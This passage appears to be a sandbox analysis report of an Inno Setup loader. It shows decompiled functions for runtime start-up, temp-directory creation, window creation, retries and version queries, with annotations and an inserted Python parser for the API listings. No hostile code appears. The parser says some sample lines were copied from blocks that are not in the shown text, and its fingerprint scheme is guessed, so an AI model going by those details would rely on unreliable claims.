                                                                                     					 *0x4bb344 = 0xd7b0;
                                                                                     					 *0x4bb620 = 0xd7b0;
                                                                                     					 *0x4bb050 = GetCommandLineW();  // command line cached in a global
                                                                                     					 *0x4bb04c = E00403810();        // subcall: GetStartupInfoW
                                                                                     					 *0x4bb97c = GetACP();           // system ANSI code page cached in a global
                                                                                     					 *0x4bb980 = 0x4b0;              // 0x4b0 = 1200, the UTF-16 code page identifier
                                                                                     					 *0x4bb044 = GetCurrentThreadId(); // main thread id cached in a global
                                                                                     					E0040CAB8();                     // subcall: GetVersion
                                                                                     					// The sequence (locale, ACP, command line, startup info, main thread id stored in globals behind a
                                                                                     					// one-shot counter, with the [fs:eax] SEH frame above) is consistent with Delphi run-time library
                                                                                     					// start-up code; on its own it is runtime initialisation, not a behaviour of interest.
                                                                                    				}
                                                                                    				_pop(_t19);
                                                                                    				 *[fs:eax] = _t19;
                                                                                    				_push(0x4b50de);
                                                                                    				return 0;
                                                                                    			}

                                                                                     (Per-line instruction address column of E004B5000, 0x004b5005 to 0x004b50d6; its alignment with the C lines was lost in extraction.)

                                                                                    APIs
                                                                                    • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                                                      • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                                      • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                                      • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                                                    • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                                                      • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                                                    • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                                                      • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2740004594-0
                                                                                    • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                                    • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                                                    • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                                    • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
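The API listings in these blocks (bullet, optional "Part of subcall function NNNNNNNN:" prefix, `Api.MODULE(args), ref: addr`) are the part of a report worth pulling into a structured form when triaging many functions at once, and the "API ID" line is a cheap per-function fingerprint to compare against. The following is an added example, not part of the report and not the sample's code: a parser for that listing format, plus a reconstruction of the API ID token scheme. The scheme is an assumption inferred only from the two API ID strings on this page (CamelCase split of each listed API name, drop tokens of three characters or fewer, group tokens by how often they occur, most frequent group first, alphabetical inside a group, "$" between groups); it is not Joe Sandbox's documented algorithm and the numeric "API String ID" is not reproduced. The sample lines are copied from the two API blocks above.

```python
import re
from collections import Counter

# Listing lines copied from the two API blocks on this page.
HALT_LINES = """
• GetCurrentThreadId.KERNEL32 ref: 00407780
• FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
• ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
  • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
  • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
  • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
  • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
""".strip().splitlines()

INIT_LINES = """
• SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
  • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
  • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
  • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
  • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
  • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
  • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
  • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
  • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
  • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
• GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
  • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
• GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
• GetCurrentThreadId.KERNEL32 ref: 004B50BA
  • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
""".strip().splitlines()

# One listing line: optional subcall prefix, Api.MODULE, optional (args), "ref: <8 hex digits>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_api_line(line):
    """One listing line -> dict, or None when the line is not an API entry."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": args.split(",") if args is not None else [],
        "ref": int(m.group("ref"), 16),
        "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
    }


def parse_api_block(lines):
    return [r for r in map(parse_api_line, lines) if r is not None]


def direct_calls(lines):
    """APIs the function calls itself, in listing order (subcall entries excluded)."""
    return [r["api"] for r in parse_api_block(lines) if r["subcall_of"] is None]


TOKEN_RE = re.compile(r"[A-Z][a-z]*")


def api_tokens(name):
    # CamelCase split; tokens of three characters or fewer (Get, Set, Std, Id, W, ACP)
    # are dropped.  ASSUMPTION: inferred from the two API ID strings on this page.
    return [t for t in TOKEN_RE.findall(name) if len(t) > 3]


def api_id(lines):
    """Rebuild the report's 'API ID' string from a listing (inferred scheme, see above)."""
    counts = Counter()
    for rec in parse_api_block(lines):
        counts.update(api_tokens(rec["api"]))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


if __name__ == "__main__":
    print(api_id(HALT_LINES))  # FileHandleWrite$CurrentExitFreeLibraryProcessThread
    print(api_id(INIT_LINES))
    print(direct_calls(HALT_LINES))
```

`direct_calls` separates what the function does itself from what its callees do, which is the distinction that matters when deciding whether a FreeLibrary/ExitProcess pair is the function's own exit path or inherited from a helper; `api_id` reproduces both "API ID" strings on this page, so the inferred scheme at least holds for these two listings.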

                                                                                    C-Code - Quality: 73%
                                                                                    			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                    				char _v8;
                                                                                    				char _v12;
                                                                                    				char* _v16;
                                                                                    				char _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				char _v28;
                                                                                    				char _v32;
                                                                                    				char _v36;
                                                                                    				char _v40;
                                                                                    				int _t30;
                                                                                    				intOrPtr _t63;
                                                                                    				void* _t71;
                                                                                    				void* _t73;
                                                                                    				intOrPtr _t75;
                                                                                    				intOrPtr _t76;
                                                                                    
                                                                                    				_t71 = __edi;
                                                                                    				_t54 = __ebx;
                                                                                    				_t75 = _t76;
                                                                                     				_t55 = 4;
                                                                                     				do {                                   // Delphi-style prologue: push zeros to zero-initialise the local slots
                                                                                     					_push(0);
                                                                                     					_push(0);
                                                                                     					_t55 = _t55 - 1;
                                                                                     				} while (_t55 != 0);
                                                                                     				_push(_t55);
                                                                                     				_push(__ebx);
                                                                                     				_t73 = __eax;
                                                                                     				_t78 = 0;
                                                                                     				_push(_t75);
                                                                                     				_push(0x4af0e1);                       // SEH frame: handler at 0x4af0e1, the cleanup block at the end of the function
                                                                                     				_push( *[fs:eax]);
                                                                                     				 *[fs:eax] = _t76;
                                                                                     				while(1) {
                                                                                     					E00422D70( &_v12, _t54, _t55, _t78); // executed; produces a fresh candidate name in _v12 (assumption: a generated name, the subcall is not shown here)
                                                                                     					_t55 = L".tmp";
                                                                                     					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed; builds the full path with the ".tmp" suffix into _v8
                                                                                     					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed; lpSecurityAttributes = NULL, so the directory inherits the parent's DACL
                                                                                     					if(_t30 != 0) {
                                                                                     						break;                         // created: _v8 is a new, previously non-existent directory
                                                                                     					}
                                                                                     					_t54 = GetLastError();
                                                                                     					_t78 = _t54 - 0xb7;
                                                                                     					if(_t54 != 0xb7) {                 // 0xb7 = 183 = ERROR_ALREADY_EXISTS: on a name collision loop and try another name; any other error is fatal
                                                                                     						E00426F08(0x3d,  &_v32, _v8);
                                                                                     						_v28 = _v32;
                                                                                     						E00419E18( &_v36, _t54, 0);
                                                                                     						_v24 = _v36;
                                                                                     						E004232EC(_t54,  &_v40);
                                                                                     						_v20 = _v40;
                                                                                     						E00426ED8(0x81, 2,  &_v28,  &_v16); // formats a message from path, error code and error text (the 2 reads as a Delphi open-array high index, i.e. three elements; inferred)
                                                                                     						_t55 = _v16;
                                                                                     						E0041F264(_v16, 1);            // raises the exception carrying that message (inferred from the pattern: no normal return)
                                                                                     						E0040711C();
                                                                                     					}
                                                                                     				}
                                                                                     				E00407E00(_t73, _v8);                  // copies the resulting path into the caller's output string (_t73 = __eax on entry; inferred)
                                                                                    				__eflags = 0;
                                                                                    				_pop(_t63);
                                                                                    				 *[fs:eax] = _t63;
                                                                                    				_push(E004AF0E8);
                                                                                    				E00407A80( &_v40, 3);
                                                                                    				return E00407A80( &_v16, 3);
                                                                                    			}

                                                                                     (Per-line instruction address column of E004AEFE8, 0x004aefe8 to 0x004af0e0; its alignment with the C lines was lost in extraction. 0x00000000 entries mark lines with no address.)

                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: .tmp
                                                                                    • API String ID: 1375471231-2986845003
                                                                                    • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                                    • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                                                    • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                                    • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                                                    				WCHAR* _v8;
                                                                                    				void* _t13;
                                                                                    				struct HWND__* _t24;
                                                                                    				WCHAR* _t29;
                                                                                    				long _t32;
                                                                                    
                                                                                    				_v8 = _t29;
                                                                                    				_t32 = __eax;
                                                                                    				_t13 = E00405740();
                                                                                    				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                    				E00405730(_t13);
                                                                                    				return _t24;
                                                                                    			}
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID: InnoSetupLdrWindow$STATIC
                                                                                    • API String ID: 716092398-2209255943
                                                                                    • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                                    • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                                                    • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                                    • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
                                                                                    				intOrPtr _v8;
                                                                                    				long _t5;
                                                                                    				long _t9;
                                                                                    				void* _t10;
                                                                                    				void* _t13;
                                                                                    				void* _t15;
                                                                                    				void* _t16;
                                                                                    
                                                                                    				_t5 = __eax;
                                                                                    				_v8 = __edx;
                                                                                    				_t9 = __eax;
                                                                                    				_t15 = _t10 - 1;
                                                                                    				if(_t15 < 0) {
                                                                                    					L10:
                                                                                    					return _t5;
                                                                                    				}
                                                                                    				_t16 = _t15 + 1;
                                                                                    				_t13 = 0;
                                                                                    				while(1) {
                                                                                    					_t19 = _t13 - 1;
                                                                                    					if(_t13 != 1) {
                                                                                    						__eflags = _t13 - 1;
                                                                                    						if(__eflags > 0) {
                                                                                    							Sleep(_a4);
                                                                                    						}
                                                                                    					} else {
                                                                                    						Sleep(_a8);
                                                                                    					}
                                                                                    					_t5 = E00427154(_t9, _v8, _t19); // executed
                                                                                    					if(_t5 != 0) {
                                                                                    						goto L10;
                                                                                    					}
                                                                                    					_t5 = GetLastError();
                                                                                    					if(_t5 == 2) {
                                                                                    						goto L10;
                                                                                    					}
                                                                                    					_t5 = GetLastError();
                                                                                    					if(_t5 == 3) {
                                                                                    						goto L10;
                                                                                    					}
                                                                                    					_t13 = _t13 + 1;
                                                                                    					_t16 = _t16 - 1;
                                                                                    					if(_t16 != 0) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					goto L10;
                                                                                    				}
                                                                                    				goto L10;
                                                                                    			}
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ErrorLastSleep
                                                                                    • String ID:
                                                                                    • API String ID: 1458359878-0
                                                                                    • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                                    • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                                                    • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                                    • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 63%
                                                                                    			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
                                                                                    				char _v8;
                                                                                    				char _v9;
                                                                                    				int _v16;
                                                                                    				void* _v20;
                                                                                    				void* _v24;
                                                                                    				int _v28;
                                                                                    				int _t33;
                                                                                    				int _t43;
                                                                                    				int _t64;
                                                                                    				intOrPtr _t72;
                                                                                    				intOrPtr _t74;
                                                                                    				signed int* _t77;
                                                                                    				signed int* _t79;
                                                                                    				void* _t81;
                                                                                    				void* _t82;
                                                                                    				intOrPtr _t83;
                                                                                    
                                                                                    				_t81 = _t82;
                                                                                    				_t83 = _t82 + 0xffffffe8;
                                                                                    				_v8 = 0;
                                                                                    				_t77 = __ecx;
                                                                                    				_t79 = __edx;
                                                                                    				_push(_t81);
                                                                                    				_push(0x420094);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t83;
                                                                                    				_v9 = 0;
                                                                                    				E00407E48( &_v8, __eax);
                                                                                    				E00407FB0( &_v8);
                                                                                    				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
                                                                                    				_t64 = _t33;
                                                                                    				if(_t64 == 0) {
                                                                                    					_pop(_t72);
                                                                                    					 *[fs:eax] = _t72;
                                                                                    					_push(0x42009b);
                                                                                    					return E00407A20( &_v8);
                                                                                    				} else {
                                                                                    					_v20 = E004053F0(_t64);
                                                                                    					_push(_t81);
                                                                                    					_push(0x420077);
                                                                                    					_push( *[fs:edx]);
                                                                                    					 *[fs:edx] = _t83;
                                                                                    					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
                                                                                    					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
                                                                                    						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
                                                                                    						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
                                                                                    						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
                                                                                    						_v9 = 1;
                                                                                    					}
                                                                                    					_pop(_t74);
                                                                                    					 *[fs:eax] = _t74;
                                                                                    					_push(0x42007e);
                                                                                    					return E0040540C(_v20);
                                                                                    				}
                                                                                    			}
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                                                    • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                                                    • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileInfoVersion$QuerySizeValue
                                                                                    • String ID:
                                                                                    • API String ID: 2179348866-0
                                                                                    • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                                    • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                                                    • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                                    • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 72%
                                                                                    			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
                                                                                    				intOrPtr _v8;
                                                                                    				signed int _v12;
                                                                                    				char _v16;
                                                                                    				char _v20;
                                                                                    				char _v24;
                                                                                    				char _v28;
                                                                                    				signed int _t41;
                                                                                    				signed short _t43;
                                                                                    				signed short _t46;
                                                                                    				signed int _t60;
                                                                                    				intOrPtr _t68;
                                                                                    				void* _t79;
                                                                                    				signed int* _t81;
                                                                                    				intOrPtr _t84;
                                                                                    
                                                                                    				_t79 = __edi;
                                                                                    				_t61 = __ecx;
                                                                                    				_push(0);
                                                                                    				_push(0);
                                                                                    				_push(0);
                                                                                    				_push(0);
                                                                                    				_push(0);
                                                                                    				_push(0);
                                                                                    				_push(__ebx);
                                                                                    				_push(__esi);
                                                                                    				_t81 = __ecx;
                                                                                    				_v12 = __edx;
                                                                                    				_v8 = __eax;
                                                                                    				E00407B04(_v8);
                                                                                    				E00407B04(_v12);
                                                                                    				_push(_t84);
                                                                                    				_push(0x40b227);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t84;
                                                                                    				E00407A20(__ecx);
                                                                                    				if(_v12 == 0) {
                                                                                    					L14:
                                                                                    					_pop(_t68);
                                                                                    					 *[fs:eax] = _t68;
                                                                                    					_push(E0040B22E);
                                                                                    					return E00407A80( &_v28, 6);
                                                                                    				}
                                                                                    				E00407E48( &_v20, _v12);
                                                                                    				_t41 = _v12;
                                                                                    				if(_t41 != 0) {
                                                                                    					_t41 =  *(_t41 - 4);
                                                                                    				}
                                                                                    				_t60 = _t41;
                                                                                    				if(_t60 < 1) {
                                                                                    					L7:
                                                                                    					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
                                                                                    					if(_v16 == 0) {
                                                                                    						L00403730();
                                                                                    						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
                                                                                    						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
                                                                                    						__eflags =  *_t81;
                                                                                    						if( *_t81 == 0) {
                                                                                    							__eflags =  *0x4bdc0c;
                                                                                    							if( *0x4bdc0c == 0) {
                                                                                    								L00403738();
                                                                                    								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
                                                                                    								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
                                                                                    							}
                                                                                    						}
                                                                                    						__eflags =  *_t81;
                                                                                    						if(__eflags == 0) {
                                                                                    							E0040B044(_v20, _t60, _t81, __eflags); // executed
                                                                                    						}
                                                                                    					} else {
                                                                                    						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
                                                                                    					}
                                                                                    					goto L14;
                                                                                    				}
                                                                                    				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
                                                                                    					_t60 = _t60 - 1;
                                                                                    					__eflags = _t60;
                                                                                    					if(_t60 != 0) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					goto L7;
                                                                                    				}
                                                                                    				_t61 = _t60;
                                                                                    				E004088AC(_v12, _t60, 1,  &_v20);
                                                                                    				goto L7;
                                                                                    			}

                                                                                    Instruction addresses (address column of the C-code above; per-line alignment lost in extraction): 0x0040b110, 0x0040b110, 0x0040b113, 0x0040b115, 0x0040b117, 0x0040b119, 0x0040b11b, 0x0040b11d, 0x0040b11f, 0x0040b120, 0x0040b121, 0x0040b123, 0x0040b126, 0x0040b12c, 0x0040b134, 0x0040b13b, 0x0040b13c, 0x0040b141, 0x0040b144, 0x0040b149, 0x0040b152, 0x0040b20c, 0x0040b20e, 0x0040b211, 0x0040b214, 0x0040b226, 0x0040b226, 0x0040b15e, 0x0040b163, 0x0040b168, 0x0040b16d, 0x0040b16d, 0x0040b16f, 0x0040b174, 0x0040b19b, 0x0040b1a1, 0x0040b1aa, 0x0040b1bb, 0x0040b1c3, 0x0040b1d0, 0x0040b1d5, 0x0040b1d8, 0x0040b1da, 0x0040b1e1, 0x0040b1e3, 0x0040b1eb, 0x0040b1f8, 0x0040b1f8, 0x0040b1e1, 0x0040b1fd, 0x0040b200, 0x0040b207, 0x0040b207, 0x0040b1ac, 0x0040b1b4, 0x0040b1b4, 0x00000000, 0x0040b1aa, 0x0040b176, 0x0040b196, 0x0040b197, 0x0040b199, 0x00000000, 0x00000000, 0x00000000, 0x0040b199, 0x0040b185, 0x0040b18f, 0x00000000

                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
